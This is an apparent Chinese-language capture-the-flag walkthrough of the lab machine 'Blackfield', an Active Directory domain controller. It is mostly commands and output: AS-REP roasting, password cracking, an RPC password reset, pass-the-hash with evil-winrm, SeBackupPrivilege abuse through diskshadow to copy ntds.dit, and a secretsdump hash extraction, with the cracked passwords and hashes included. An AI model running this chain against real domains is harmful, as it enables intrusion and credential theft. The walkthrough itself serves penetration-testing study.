sudo nmap -p- -n --open -v 10.10.10.192
nmap -p 53,88,135,139,389,445,593,3268,49676 -sV -A -Pn 10.10.10.192
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 18:23:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h03m47s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-12T18:23:55
|_ start_date: N/A
匿名登录无权限执行命令:
rpcclient -U "" -N 10.10.10.192
smbclient --no-pass -L //10.10.10.192/
经过测试,只有IPC$可以匿名连接
nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.192
输出太长,几个可能有用的:
域名:BLACKFIELD.local
rootDomainNamingContext: DC=BLACKFIELD,DC=local ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
dnsHostName: DC01.BLACKFIELD.local
./kerbrute_linux_amd64 userenum -d BLACKFIELD.local --dc 10.10.10.192 /home/wuerror/Documents/SecLists-2021.3.1/Usernames/xato-net-10-million-usernames.txt
暂时发现两个,继续跑。我们先试试support
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/support
john --wordlist=/usr/share/wordlists/rockyou.txt blacksupport.txt
john --show blacksupport.txt
得到密码#00^BlackKnight
尝试psexec无可写权限,wmiexec也不成功。登录rpc继续信息收集
rpcclient -U support%#00^BlackKnight 10.10.10.192
结尾还有svc_backup,lydericlefebvre两个用户
得到域用户名,上面的爆破可以停了
Administrator
Guest
krbtgt
audit2020
support
svc_backup
lydericlefebvre
再一次asreproast,结果没有新增还是只有support。
使用support账户尝试kerberoating获取tgs失败
support登录smb服务
smbmap -H 10.10.10.192 -d BLACKFIELD.local -u support -p '#00^BlackKnight'
smbclient //10.10.10.192/SYSVOL -U "support"%"#00^BlackKnight"
先选个最有嫌疑的登录上去
但最终这几个可读的都没什么线索
看wp使用bloodhoud分析
bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
sudo neo4j console
bloodhound
启动bloodhound后通过upload data将生成的json上传,在analysis中选择findasreproastable users找到support用户节点。
点击support节点,在node info->outbound control rights->first degree object control属性里有一条:可重置audit2020账号的密码。
我们可以通过rpc来重置密码
net rpc password audit2020 -U support -S 10.10.10.192
或者
rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "0xdf!!!"'
重置为0xdf!!! 再次检查smb
smbmap -H 10.10.10.192 -d BLACKFIELD.local -u audit2020 -p '0xdf!!!'
发现forensic可读
smbclient //10.10.10.192/forensic -U "audit2020"%'0xdf!!!'
3个文件夹,command_output里面有几个命令输出的txt,
在其中发现管理员组里还有个Ipwn3dYouCompany用户之前没发现
memory里有个lsass.zip,下下来不是就能拿hash了。tools里有volatility等工具
但是网太差了,下不下来。直接翻wp,就当下了吧,,,,
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
成功登录
在c:\根目录找到notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
whoami /priv
查看到有SeBackupPrivilege权限
将下面内容放到diskshadow.txt,大意是会把c盘复制出一个z盘,这个z盘我们是可以读取的,所以就能拿到ntds.dit文件了
set context persistent nowriters
add volume c: alias pwn
create
expose %pwn% z:
再把格式转成dos,传上去
unix2dos diskshadow.txt
mkdir c:\temp
cd c:\temp #后续命令都在c:\temp目录下执行,以规避执行中碰到的权限问题
upload /home/wuerror/Downloads/temp/diskshadow.txt
diskshadow.exe /s .\diskshadow.txt
robocopy /b z:\windows\ntds . ntds.dit
reg save HKLM\SYSTEM c:\temp\system
download c:\temp\ntds.dit /home/wuerror/Downloads/temp/ntds.dit
download c:\temp\system /home/wuerror/Downloads/temp/system
不指定具体的下载文件位置,还下不下来
再导出hash
impacket-secretsdump -ntds ntds.dit -system system local |tee blackfield-hash.txt
再从日志中把administrator的hash拿出来
evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。